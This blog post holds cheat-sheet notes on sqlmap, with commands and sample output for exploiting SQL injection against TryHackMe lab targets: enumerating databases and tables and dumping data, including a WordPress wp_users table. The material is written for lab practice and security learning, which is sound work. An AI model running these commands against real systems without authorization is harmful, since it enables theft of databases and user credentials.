Skip to main content

sqlmap: Notes

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

apt install sqlmap

sqlmap -u http://10.10.239.79 --forms --dump

Use sqlmap with Burp Suite

sqlmap -r filename-saved-from-burpsuite

sqlmap -r sqlinjection2 --tamper=space2comment --dbms=sqlite --dump --level 5

Example: Dump SQlite

# sqlmap -r sqli-day5 --level 2 --batch --dbms=SQlite --dump

List all databases

# sqlmap -u http://10.10.200.148/users/login.php -forms -batch --dbms=mysql --dbs
...
[19:05:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[19:05:23] [INFO] fetching database names
[19:05:24] [INFO] retrieved: 'information_schema'
[19:05:24] [INFO] retrieved: 'wackopicko'
available databases [2]:
[*] information_schema
[*] wackopicko
...

List tables in a database

sqlmap -u http://10.10.200.148/users/login.php -forms -batch --dbms=mysql -D wackopicko --tables
...
[19:09:12] [INFO] testing MySQL
[19:09:12] [INFO] confirming MySQL
[19:09:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.0.0
[19:09:13] [INFO] fetching tables for database: 'wackopicko'
[19:09:13] [INFO] retrieved: 'admin'
[19:09:14] [INFO] retrieved: 'admin_session'
[19:09:14] [INFO] retrieved: 'cart'
[19:09:14] [INFO] retrieved: 'cart_coupons'
[19:09:14] [INFO] retrieved: 'cart_items'
[19:09:15] [INFO] retrieved: 'comments'
[19:09:15] [INFO] retrieved: 'comments_preview'
[19:09:15] [INFO] retrieved: 'conflict_pictures'
[19:09:15] [INFO] retrieved: 'coupons'
[19:09:15] [INFO] retrieved: 'guestbook'
[19:09:16] [INFO] retrieved: 'own'
[19:09:16] [INFO] retrieved: 'pictures'
[19:09:16] [INFO] retrieved: 'users'
Database: wackopicko
...

Exampe dumb data from wp_users table of wordpress database

sqlmap -u http://wekor.thm/it-next/it_cart.php --forms --dbms=mysql -D wordpress -T wp_users --dump --batch

Reference

>>> sqlmap cheat sheet

>>> THM | 25 Days of Cyber Security - Day 5

Practice

>>> https://tryhackme.com/room/ccpentesting

>>> The Cod Caper | Task 4 - Web Exploitation

>>> THM Advant of Cyber 2 | Task 10 - Day 5

>>> THM | SQL Injection Lab

>>> THM | 25 Days of Cyber Security - Day 5

>>> THM | Wekor

>>> THM | WebAppSec 101

Labels:

Popular posts from this blog

IIS: Delete cached files on server running IIS

Delete cached files on server running IIS When changing css, javascript files, check to delete if IIS still caches old files in the default folder C:\inetpub\temp\IIS Temporary Compressed Files\<sitename>\$^_gzip_D^\ Apply to: IIS 8.5
Read more

Linux command: du - disk usage

Where have all my storage gone? du summarize disk usage of the set of FILEs, recursively for directories.
Read more

ManageEngine ServiceDesk Plus - Reset password

Let's reset the default administrator's password to 'admin'
Read more